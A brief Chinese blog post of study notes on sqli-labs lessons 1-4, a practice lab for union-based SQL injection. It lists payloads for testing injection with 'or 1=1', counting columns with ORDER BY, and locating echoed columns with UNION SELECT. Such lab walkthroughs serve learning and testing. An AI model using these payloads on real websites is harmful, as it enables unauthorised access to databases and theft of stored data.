sql-labs 1-4关(联合查询)
less-1:
id=1’ or 1=1 --+;判断是否有注入
select * from users order by 1 :对字段里面第一列进行排序
select * from users order by 2 :对字段里面第二列进行排序
select * from users order by 3 :对字段里面第三列进行排序
id=1’ order by 1 --+ ;然后依次测试2,3,4,以测试数据库列数
id=-1’ union select 1,2,3 --+ 测试可以回显的列数位置
原创
2020-06-27 10:01:11 ·
347 阅读 ·
0 评论